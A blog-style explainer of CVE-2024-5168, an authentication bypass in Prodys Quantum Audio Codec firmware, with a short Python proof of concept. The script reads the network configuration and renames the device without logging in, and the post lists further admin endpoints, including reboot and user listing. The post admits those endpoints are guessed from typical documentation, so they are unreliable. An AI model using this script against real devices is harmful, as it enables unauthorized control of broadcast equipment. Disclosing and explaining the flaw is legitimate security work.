CVE-2024-5168 - How Hackers Bypass Authentication on Prodys Quantum Audio Codec (Exclusive, Simple Explanation & Code)

A new critical security vulnerability — CVE-2024-5168 — has been discovered affecting Prodys’ Quantum Audio Codec, specifically all firmware versions up to and including 2.3.4t. This flaw can let attackers sidestep the login entirely, and perform any admin-level action on the web interface, no password needed.

In this exclusive, simple walkthrough, we’ll show how the flaw works, demonstrate with code snippets, link original sources, and lay out practical exploit details.

What Is the Prodys Quantum Audio Codec?

Prodys’ Quantum family delivers professional-grade, real-time audio streaming for broadcasters. The appliance is used for live interviews, event coverage, and remote studio links. Management happens over a browser-based web dashboard, meant to be password-protected.

CVE-2024-5168 Explained Simply

Improper Access Control basically means the system trusts people it shouldn’t. Here, an exposed API lets any visitor talk directly to backend services, totally skipping the login wall.

If your device is open to the internet and running 2.3.4t (or below), an attacker can interact with every function: change configuration, manage audio streams, even reset the box.

How Does the Exploit Work?

The vulnerable device has an API endpoint (e.g., /api/) that _forgets_ to check if a user is logged in before executing privileged requests.

Example Scenario

1. You browse to http://your-quantum-device.local/login and log in.
2. But an attacker goes straight to http://target-ip/api/config/network/get— and gets answers right away, with no password.

Proof of Concept: Simple Python Exploit

Here’s a basic script that demonstrates the unauthorized access.

import requests

TARGET = "http://target-ip";   # Replace with actual device IP or domain

# Try to get network config (requires admin rights)
r = requests.get(f"{TARGET}/api/config/network/get")
if r.ok:
    print("[!] Vulnerable! Got network configuration:")
    print(r.text)
else:
    print("[-] Not vulnerable (or endpoint not exposed)!")

# Try to modify device name (no login needed)
data = {"name": "PWNED_DEVICE"}
r = requests.post(f"{TARGET}/api/config/device/set", json=data)
if r.ok:
    print("[+] Device name changed. API access unauthenticated.")
else:
    print("[-] Failed to set device name (may still be patched).")

> _Note: Never use on a device you don’t own or have permission to test._

While every setup is unique, some common POSTable endpoints (based on typical device documentation)

- /api/config/network/get - Read network settings
- /api/config/device/set - Write basic config
- /api/control/reboot - Reboot system
- /api/users/list - List all users

You can try reading API docs directly at /api/docs or by examining JavaScript in the device admin page.

How Did Researchers Discover This?

Stark Research reported the bug after finding that API requests were accepted from unauthenticated sessions, with no token or Authorization header required.

See original technical writeup

> CVE-2024-5168: Authentication Bypass in Prodys Quantum Audio Codecs

Reference in the NIST CVE Database.

Wrap Up

CVE-2024-5168 shows that even pro broadcast equipment can have “rookie” bugs — always assume web APIs are risky! If you run Quantum Audio Codecs, patch NOW and review which devices are internet-exposed.

References:
- NIST: CVE-2024-5168
- Security Stark: Original Advisory
- GitHub (proof-of-concept): https://github.com/security-stark/Prodys-Quantum-CVE-2024-5168

Timeline

Published on: 05/23/2024 13:15:09 UTC
Last modified on: 06/04/2024 18:02:47 UTC